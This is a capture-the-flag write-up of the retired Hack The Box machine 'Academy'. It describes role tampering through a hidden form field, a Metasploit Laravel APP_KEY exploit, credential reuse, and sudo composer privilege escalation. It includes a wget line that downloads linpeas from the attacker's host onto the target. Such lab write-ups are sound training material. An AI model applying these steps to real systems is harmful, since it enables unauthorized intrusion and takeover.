Welcome to this write up for the machine ‘academy’ from Hack the box platform. This box is considred to be easy and has been released on November 07, 2020. As it’s now retired, we can review this box together, get a user flag and finally root one! If you’re ready, let’s start this write up !
First, I put box IP in my hosts file, with host name academy.htb :
Let’s start with a classic nmap scan to see open ports :
nmap -sC -sV academy.htb
It seems that we have 2 open ports, ssh on port 22 and a website with apache on 80. So we can just check the site, if we open it from our browser, we have this index page :
We see immediately a login and register links in the top left corner. I checked the source code but nothing relevant there… So I’ll act like a normal user and go to the register page to create an account :
I create an account with a username, a password, and I confirm it, then I have a confirmation of the account’s creation, so I can log in.
We have a page to learn some stuff but nothing interesting: every link is fake and it’s just like a normal page with some content displayed on: no interaction with my account or something I can do. So, we can start enumeration with gobuster to see if we have some hidden folders or files.
2 interesting files there : admin and config. config.php gives nothing, but with admin.php we have a login page. If I try to log in with credentials I just created, nothing happenens.
At this point, I returned to register page to check the code source and we have something really unusual :
In the form used to register, we have a hidden field called ‘roleid’. Probably, if we can change the value, we can get like an account with more privileges, so I send the form request to burp :
And the with burp repeater, I just modify roleid from 0 to 1 :
Answer is 302, it probably worked out, now I return to the admin page and use credentials for the account just created…
Now we have access to the admin page ! 5th row confirms that with the form we create by default a ‘basic/student’ account and by modifying roleid, we created an admin account. Let’s check the page, 2 pieces of information there : first we have 2 names, cry0l1t3 and mrb3n: this could be potential usernames, so we save them in case we find a password. But main information here is on the last row with a subdomain ! I register this in my host file :
When we go the web site , we get something like that :
An error appears, which is presumably normal, because the admin page showed an issue that devs have to fix. What is interessting there is that with the error, logs reveal some critical information about dev environment and sensitive data :
Credentials for a database and app_key which have to be secret. We can notice that they use Laravel, a popular PHP framework used to build websites. At this point, I imagine that there is a way to use app key to get a shell with CVE or use credentials to access database. The problem here is that there is no such service like phpmyadmin or adminer to access database apart from the machine itself. So we can check for a CVE concerning laravel with searchsploit :
6th row with metasploit exploit seems interesting, RCE is what we’re looking for. If you don’t have this row in your results, maybe your searchspoit is outdated so you can update it with command ‘searchsploit -u’. We launch metasploit with command ‘msfconsole’ and then we search for this exploit by tapping ‘search laravel’.
We select it with command ‘use 0’ and then we look at the necessary options to be provided before running the exploit. So here, I provide rhosts (box IP), vhost (subdomain — dev-staging-01.academy.htb) lhost (my HTB IP) and App_key that we found on the website.
And we have a shell ! We do not have a shell with privileges but foothold mission is completed ! The aim now is to find a way to get connected as a user from the machine, you can check existing users from home folder and see that there are two usernames that look familiar : cry0l1t3 and mrb3n.
If we do some research in academy website folder, we see that the application is also built with laravel. We can look into .env file, which is the file we saw on the subdomain with the database credentials and the app key:
There is a password for a database. I tried to log as ‘dev’ with this password but it didn’t work. I supposed that this password is either a rabbit hole or the password for one of the users. I tried to log by ssh as cry0l1t3 and it works !
Now we are logged as a user of the system and we can check our home folder to see the first flag. You can enhance your shell by using the following command:
python3 -c “import pty; pty.spawn(‘/bin/bash’)”
Last step : privilege escalation. We need to get root access. If we look at our permission with ‘sudo -l’ command, there is nothing. Looking for a cron : nothing. Looking for an interessting file in one of the user’s repository : nothing too. Then we can use linpeas script to find a way for privesc.
First, from my computer, I create a server on port 8000 with python:
python3 -m http.server 8000
And from htb box, you can download the script with wget tool:
wget http://<YOUR_IP>:8000/linpeas.sh
We don’t forget to modify file permission :
chmod +x linpeas.sh
Now you can run the script ‘./linpeas.sh’
As the script is running, a very interesting element appears :
we have a password for user ‘mrb3n’ in logs, so let’s use it to create a session with this user. We can use ssh from our computer terminal or use command ‘su mrb3n’ from actual cry0l1t3 session.
With this user, we’ll do the same process as cry0l1t3’s session : check permissions.
We can use composer, even from root! There is probably a way to take advantage from it. We can use the website ‘GTFO Bins’ and search for composer :
It is almost over, we just have to run commands from sudo section, and…
Here we are, we got root! Now we can check the root flag from the root folder, to end this box.
We also have a message from HTB team, to promote their new platform, HTB academy:
Now this box is entirely finished ! I hope you enjoyed it. This academy box was very pleasant to explore and involved some useful techniques. If you have any question concerning the box or the article itself, don’t hesitate to share it ! Have fun, and Happy hacking !
